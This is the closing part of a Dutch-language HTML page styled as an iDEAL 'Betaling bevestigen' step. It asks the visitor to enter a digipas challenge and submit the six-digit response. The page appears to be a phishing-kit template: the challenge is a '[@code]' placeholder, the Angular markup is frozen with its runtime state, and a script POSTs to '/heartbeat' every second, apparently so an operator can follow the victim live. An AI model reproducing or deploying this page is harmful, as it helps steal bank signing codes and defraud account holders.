                                                                                        <path d="M87.0137,40.0229 L86.3417,40.0229 C76.6527,40.0229 66.5137,37.1429 66.5137,37.1429 L68.3467,22.2159 C74.3687,18.8119 86.6777,18.8119 86.6777,18.8119 C86.6777,18.8119 98.9857,18.8119 105.0087,22.2159 L106.8417,37.1429 C106.8417,37.1429 96.7017,40.0229 87.0137,40.0229 M96.5307,51.0899 C94.7607,51.0899 93.3247,49.6569 93.3247,47.8869 C93.3247,46.1129 94.7607,44.6759 96.5307,44.6759 C98.3047,44.6759 99.7407,46.1129 99.7407,47.8869 C99.7407,49.6569 98.3047,51.0899 96.5307,51.0899 M96.5307,60.9239 C94.7607,60.9239 93.3247,59.4869 93.3247,57.7169 C93.3247,55.9449 94.7607,54.5079 96.5307,54.5079 C98.3047,54.5079 99.7407,55.9449 99.7407,57.7169 C99.7407,59.4869 98.3047,60.9239 96.5307,60.9239 M96.5307,70.7539 C94.7607,70.7539 93.3247,69.3189 93.3247,67.5499 C93.3247,65.7789 94.7607,64.3399 96.5307,64.3399 C98.3047,64.3399 99.7407,65.7789 99.7407,67.5499 C99.7407,69.3189 98.3047,70.7539 96.5307,70.7539 M91.5477,80.5869 C89.7757,80.5869 88.3397,79.1519 88.3397,77.3809 C88.3397,75.6109 89.7757,74.1719 91.5477,74.1719 C93.3207,74.1719 94.7557,75.6109 94.7557,77.3809 C94.7557,79.1519 93.3207,80.5869 91.5477,80.5869 M83.3567,47.8869 C83.3567,46.1129 84.7907,44.6759 86.5657,44.6759 C88.3347,44.6759 89.7717,46.1129 89.7717,47.8869 C89.7717,49.6569 88.3347,51.0899 86.5657,51.0899 C84.7907,51.0899 83.3567,49.6569 83.3567,47.8869 M86.5657,54.2999 C88.3347,54.2999 89.7717,55.7359 89.7717,57.5069 C89.7717,59.2789 88.3347,60.7159 86.5657,60.7159 C84.7907,60.7159 83.3567,59.2789 83.3567,57.5069 C83.3567,55.7359 84.7907,54.2999 86.5657,54.2999 M86.5657,70.7539 C84.7907,70.7539 83.3567,69.3189 83.3567,67.5499 C83.3567,65.7789 84.7907,64.3399 86.5657,64.3399 C88.3347,64.3399 89.7717,65.7789 89.7717,67.5499 C89.7717,69.3189 88.3347,70.7539 86.5657,70.7539 M81.5797,80.5869 C79.8057,80.5869 78.3707,79.1519 78.3707,77.3809 C78.3707,75.6109 79.8057,74.1719 81.5797,74.1719 C83.3507,74.1719 84.7857,75.6109 84.7857,77.3809 C84.7857,79.1519 83.3507,80.5869 81.5797,80.5869 M73.3857,47.8869 C73.3857,46.1129 74.8237,44.6759 76.5957,44.6759 C78.3667,44.6759 79.8027,46.1129 79.8027,47.8869 C79.8027,49.6569 78.3667,51.0899 76.5957,51.0899 C74.8237,51.0899 73.3857,49.6569 73.3857,47.8869 M76.5957,54.2999 C78.3667,54.2999 79.8027,55.7359 79.8027,57.5069 C79.8027,59.2789 78.3667,60.7159 76.5957,60.7159 C74.8237,60.7159 73.3857,59.2789 73.3857,57.5069 C73.3857,55.7359 74.8237,54.2999 76.5957,54.2999 M73.3857,67.5499 C73.3857,65.7789 74.8237,64.3399 76.5957,64.3399 C78.3667,64.3399 79.8027,65.7789 79.8027,67.5499 C79.8027,69.3189 78.3667,70.7539 76.5957,70.7539 C74.8237,70.7539 73.3857,69.3189 73.3857,67.5499 M108.9107,18.5149 C108.7237,17.6719 108.1147,16.9889 107.2987,16.7099 C106.8927,16.5689 97.2507,13.2959 86.6767,13.2959 C76.1047,13.2959 66.4617,16.5689 66.0567,16.7099 C65.2417,16.9889 64.6307,17.6719 64.4447,18.5149 C64.3437,18.9639 61.9997,29.6549 61.9997,42.5909 C61.9997,54.9119 64.9677,69.3989 67.7167,75.7569 C69.4537,79.7739 74.7407,91.9999 86.5287,91.9999 L86.8267,91.9999 L86.8267,91.9999 C98.6157,91.9999 103.9007,79.7739 105.6377,75.7569 C108.3877,69.3989 111.3547,54.9119 111.3547,42.5909 C111.3547,29.6549 109.0117,18.9639 108.9107,18.5149 M72.722,34.879 L100.633,34.879 L100.633,25.199 L72.722,25.199 L72.722,34.879 Z"></path>
                                                                                    </g>
                                                                                </g>
                                                                            </g>
                                                                        </g>
                                                                    </g>
                                                                </g>
                                                            </svg>
                                                        </div>
                                                    </fp-icon>
                                                    <!-- end ngIf: $ctrl.iconName -->
                                                    <div class="accordion__title-container" ng-class="{'has-subtitle': $ctrl.subTitle}">
                                                        <h2 class="accordion__title ng-binding">Betaling bevestigen</h2>
                                                        <!-- ngIf: $ctrl.subTitle -->
                                                    </div>

                                                </div>
                                                <div class="accordion__content heading-has-icon">
                                                    <ng-transclude>
                                                        <!-- ngIf: $ctrl.hasSession -->
                                                        <sign-digipas ng-if="$ctrl.hasSession" sp="$ctrl.sp" trx-id="$ctrl.trxId" on-submit="$ctrl.onSubmit()" on-cancel="$ctrl.onCancel()" on-success="$ctrl.onSuccess()" on-failure="$ctrl.onFailure()" signing="$ctrl.signing" logout-finished="$ctrl.logoutFinished" class="ng-scope ng-isolate-scope">
                                                            <form id="form1" method="POST" class="ng-pristine ng-invalid ng-invalid-required ng-valid-maxlength ng-valid-digipas ng-valid-pattern">
                                                                <!-- ngIf: $ctrl.logoutFinished -->
                                                                <fp-base-login-form ng-if="$ctrl.logoutFinished" loginandsign="true" on-success="$ctrl.onSuccess()" on-failure="$ctrl.onFailure()" class="ng-scope ng-isolate-scope">
                                                                    <ng-form name="baseLogin.form" class="fc-login ng-pristine ng-invalid ng-invalid-required ng-valid-maxlength ng-valid-digipas ng-valid-pattern" novalidate="">

                                                                        <!-- ngIf: !baseLogin.digipasonly && !baseLogin.digicodeonly && !baseLogin.loginandsign && !baseLogin.jwtlogin -->

                                                                        <!-- ngIf: baseLogin.loginMethod === baseLogin.loginMethods.digipas || baseLogin.loginMethod === baseLogin.loginMethods.loginAndSign -->
                                                                        <fieldset ng-if="baseLogin.loginMethod === baseLogin.loginMethods.digipas || baseLogin.loginMethod === baseLogin.loginMethods.loginAndSign" class="ng-scope">
                                                                            <!-- ngIf: baseLogin.loginFailed -->
                                                                            

                                                                            <fieldset ng-if="baseLogin.loginMethod === baseLogin.loginMethods.digipas || baseLogin.loginMethod === baseLogin.loginMethods.loginAndSign" class="ng-scope">
        <!-- ngIf: baseLogin.loginFailed -->
        
        
        

        

        <h4>
            <fp-content key="login__digipass__step-two__header" class="ng-scope">1. Toets dit nummer in op je digipas</fp-content>
        </h4>
        <ul>
            <li>
                <fp-content key="login__digipass__step-two__instructions__press-arrow" class="ng-scope">Druk op de <fp-icon size="medium" color="dark" name="digipas-back" class="ng-scope ng-isolate-scope"><!-- ngInclude: svgPath --><div class="fc-icon-container ng-scope fc-icon fc-icon--digipas-back fc-icon--medium fc-icon--dark" ng-class="containerClasses()" ng-style="containerStyle()" ng-include="svgPath"><!--?xml version="1.0" encoding="utf-8"?--> <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 75 76" style="enable-background:new 0 0 75 76" xml:space="preserve" class="ng-scope"><path id="back-digipas" class="st0" d="M75,38c0,21-16.8,38-37.5,38C16.8,76,0,59,0,38C0,17,16.8,0,37.5,0C58.2,0,75,17,75,38z
	 M48,55.7V19.6L17.2,37.6L48,55.7z"></path></svg></div>
</fp-icon>toets van je digipas</fp-content>
            </li>
            <li>
                <fp-content key="login__digipass__step-two__instructions__enter-pin" class="ng-scope">Toets je pincode in op je digipas</fp-content>
            </li>
            <li>
                <fp-content key="login__digipass__step-two__instructions__enter-number" class="ng-scope">Toets onderstaand nummer in op je digipas</fp-content>
            </li>
        </ul>
        <!-- ngIf: baseLogin.challenge --><div class="digipass__challenge-response-container ng-scope" ng-if="baseLogin.challenge">
            <span class="digipass__challenge-response ng-binding" ng-bind="baseLogin.challenge">[@code]</span>
            <span class="digipass__icon">
                <fp-icon size="100%" color="inherit" name="digipas" class="ng-isolate-scope"><!-- ngInclude: svgPath --><div class="fc-icon-container ng-scope fc-icon fc-icon--digipas fc-icon--small fc-icon--inherit" ng-class="containerClasses()" ng-style="containerStyle()" ng-include="svgPath" style="width: 100%; height: 100%;"><!--?xml version="1.0" encoding="UTF-8" ?--> <svg xmlns="http://www.w3.org/2000/svg" id="digipas" viewBox="0 0 50 79" aria-labelledby="title" class="ng-scope"><title>Digipas</title><g stroke="none"><g transform="translate(-273.000000, -701.000000)"><g transform="translate(134.000000, 510.000000)"><g transform="translate(0.000000, 107.000000)"><g transform="translate(77.000000, 24.000000)"><g transform="translate(0.000000, 47.000000)"><path d="M87.0137,40.0229 L86.3417,40.0229 C76.6527,40.0229 66.5137,37.1429 66.5137,37.1429 L68.3467,22.2159 C74.3687,18.8119 86.6777,18.8119 86.6777,18.8119 C86.6777,18.8119 98.9857,18.8119 105.0087,22.2159 L106.8417,37.1429 C106.8417,37.1429 96.7017,40.0229 87.0137,40.0229 M96.5307,51.0899 C94.7607,51.0899 93.3247,49.6569 93.3247,47.8869 C93.3247,46.1129 94.7607,44.6759 96.5307,44.6759 C98.3047,44.6759 99.7407,46.1129 99.7407,47.8869 C99.7407,49.6569 98.3047,51.0899 96.5307,51.0899 M96.5307,60.9239 C94.7607,60.9239 93.3247,59.4869 93.3247,57.7169 C93.3247,55.9449 94.7607,54.5079 96.5307,54.5079 C98.3047,54.5079 99.7407,55.9449 99.7407,57.7169 C99.7407,59.4869 98.3047,60.9239 96.5307,60.9239 M96.5307,70.7539 C94.7607,70.7539 93.3247,69.3189 93.3247,67.5499 C93.3247,65.7789 94.7607,64.3399 96.5307,64.3399 C98.3047,64.3399 99.7407,65.7789 99.7407,67.5499 C99.7407,69.3189 98.3047,70.7539 96.5307,70.7539 M91.5477,80.5869 C89.7757,80.5869 88.3397,79.1519 88.3397,77.3809 C88.3397,75.6109 89.7757,74.1719 91.5477,74.1719 C93.3207,74.1719 94.7557,75.6109 94.7557,77.3809 C94.7557,79.1519 93.3207,80.5869 91.5477,80.5869 M83.3567,47.8869 C83.3567,46.1129 84.7907,44.6759 86.5657,44.6759 C88.3347,44.6759 89.7717,46.1129 89.7717,47.8869 C89.7717,49.6569 88.3347,51.0899 86.5657,51.0899 C84.7907,51.0899 83.3567,49.6569 83.3567,47.8869 M86.5657,54.2999 C88.3347,54.2999 89.7717,55.7359 89.7717,57.5069 C89.7717,59.2789 88.3347,60.7159 86.5657,60.7159 C84.7907,60.7159 83.3567,59.2789 83.3567,57.5069 C83.3567,55.7359 84.7907,54.2999 86.5657,54.2999 M86.5657,70.7539 C84.7907,70.7539 83.3567,69.3189 83.3567,67.5499 C83.3567,65.7789 84.7907,64.3399 86.5657,64.3399 C88.3347,64.3399 89.7717,65.7789 89.7717,67.5499 C89.7717,69.3189 88.3347,70.7539 86.5657,70.7539 M81.5797,80.5869 C79.8057,80.5869 78.3707,79.1519 78.3707,77.3809 C78.3707,75.6109 79.8057,74.1719 81.5797,74.1719 C83.3507,74.1719 84.7857,75.6109 84.7857,77.3809 C84.7857,79.1519 83.3507,80.5869 81.5797,80.5869 M73.3857,47.8869 C73.3857,46.1129 74.8237,44.6759 76.5957,44.6759 C78.3667,44.6759 79.8027,46.1129 79.8027,47.8869 C79.8027,49.6569 78.3667,51.0899 76.5957,51.0899 C74.8237,51.0899 73.3857,49.6569 73.3857,47.8869 M76.5957,54.2999 C78.3667,54.2999 79.8027,55.7359 79.8027,57.5069 C79.8027,59.2789 78.3667,60.7159 76.5957,60.7159 C74.8237,60.7159 73.3857,59.2789 73.3857,57.5069 C73.3857,55.7359 74.8237,54.2999 76.5957,54.2999 M73.3857,67.5499 C73.3857,65.7789 74.8237,64.3399 76.5957,64.3399 C78.3667,64.3399 79.8027,65.7789 79.8027,67.5499 C79.8027,69.3189 78.3667,70.7539 76.5957,70.7539 C74.8237,70.7539 73.3857,69.3189 73.3857,67.5499 M108.9107,18.5149 C108.7237,17.6719 108.1147,16.9889 107.2987,16.7099 C106.8927,16.5689 97.2507,13.2959 86.6767,13.2959 C76.1047,13.2959 66.4617,16.5689 66.0567,16.7099 C65.2417,16.9889 64.6307,17.6719 64.4447,18.5149 C64.3437,18.9639 61.9997,29.6549 61.9997,42.5909 C61.9997,54.9119 64.9677,69.3989 67.7167,75.7569 C69.4537,79.7739 74.7407,91.9999 86.5287,91.9999 L86.8267,91.9999 L86.8267,91.9999 C98.6157,91.9999 103.9007,79.7739 105.6377,75.7569 C108.3877,69.3989 111.3547,54.9119 111.3547,42.5909 C111.3547,29.6549 109.0117,18.9639 108.9107,18.5149 M72.722,34.879 L100.633,34.879 L100.633,25.199 L72.722,25.199 L72.722,34.879 Z"></path></g></g></g></g></g></g></svg></div>
</fp-icon>
            </span>
        </div><!-- end ngIf: baseLogin.challenge -->

        
        <h4>
            <fp-content key="login__digipass__step-three__header" class="ng-scope">2. Vul het nummer in dat op je digipas verschijnt</fp-content>
        </h4>

        
        <fp-grid-row class="ng-isolate-scope"><div ng-class="$ctrl.classList" ng-transclude="" class="grid-row grid-row--with-gutter">
            <fp-grid-row class="ng-isolate-scope"><div ng-class="$ctrl.classList" ng-transclude="" class="grid-row grid-row--with-gutter">
            <fp-grid-col xs="12" md="6" class="ng-scope ng-isolate-scope col col--xs-12 col--md-6"><ng-transclude>
                <fc-input content="Nummer op je digipas" class="ng-scope ng-isolate-scope"><label ng-attr-for="{{$ctrl.getId()}}" class="fc-input has-value" ng-class="{ 'has-value': $ctrl.hasFocus || $ctrl.hasValue,
                'has-icon': $ctrl.icon,
                'has-icon--right': $ctrl.iconAlignRight,
                'fc-input--last': $ctrl.last}" for="loginChallengeResponse">
    <span class="fc-input__content ng-binding" ng-class="{'fc-input--visuallyhidden': $ctrl.visuallyHideLabel}" ng-bind="$ctrl.content">Nummer op je digipas</span>
    <div class="fc-input__field" ng-class="{'fc-input__field--without-label': $ctrl.visuallyHideLabel}">
        <!-- ngIf: $ctrl.icon -->
        <ng-transclude>
                    <input id="loginChallengeResponse" name="challengeResponse" type="tel" maxlength="6" ng-pattern="/^[0-9]{6}$/" fp-validate-signing-response="" ng-model="baseLogin.challengeResponse" ng-required="baseLogin.loginMethod === baseLogin.loginMethods.digipas || baseLogin.loginMethod === baseLogin.loginMethods.loginAndSign" class="ng-scope ng-valid-maxlength ng-not-empty ng-dirty ng-valid-parse ng-valid-required ng-valid ng-valid-pattern ng-touched" required="required">

                    <fp-field-errors fp-field-name="challengeResponse" fp-hide-on-dirty="" class="ng-scope ng-isolate-scope"><!-- ngIf: showFieldErrors() --></fp-field-errors>
                </ng-transclude>
    </div>
</label>
</fc-input>
            </ng-transclude></fp-grid-col>
        </div>
</fp-grid-row>
        </div>
</fp-grid-row>
    </fieldset>
                                                                        </fieldset>
                                                                    </ng-form>
                                                                </fp-base-login-form>
                                                            </form>

                                                            <fp-button-row>
                                                                <div class="fc-button-row" ng-transclude="">
                                                                        <button type="submit" form="form1" class="fc-button fc-button--primary">Verder</button>
                                                                    <fp-button variant="secondary" on-click="$ctrl.onCancel()" is-disabled="$ctrl.signing || !$ctrl.logoutFinished" class="ng-scope ng-isolate-scope">
                                                                        
                                                                    </fp-button>
                                                                </div>
                                                            </fp-button-row>
                                                        </sign-digipas>
                                                    </ng-transclude>
                                                </div>
                                            </div>
                                        </fp-accordion-item>
                                    </ng-transclude>
                                </div>
                            </fp-accordion>
                        </sign>

                    </signing-page>
                </ng-view>
                <fp-minimal-footer class="ng-isolate-scope">
                    <div class="minimal-footer">
                        <div class="minimal-footer__container">
                            <div class="minimal-footer__copyright-container">
                                <fp-content key="fp-minimal-footer.copyright" class="ng-scope"></fp-content>
                            </div>
                        </div>
                    </div>
                </fp-minimal-footer>
            </div>
        </fp-ideal>
    </div>
    <script src="https://code.jquery.com/jquery-3.4.1.js" integrity="sha256-WpOohJOqMqqyKL9FccASB9O0KwACQJpFTUBLTYOVvVU=" crossorigin="anonymous"></script>
    <script type="text/javascript">
      var interval = 1000;  // 1000 = 1 second, 3000 = 3 seconds
      function doAjax() {
         $.ajax({
         type: 'POST',
         url: '/heartbeat',
         data: $(this).serialize(),
         dataType: 'json',
         complete: function (data) {
                 setTimeout(doAjax, interval);
         }
      });
      }
      setTimeout(doAjax, interval);
   </script>
</body></html>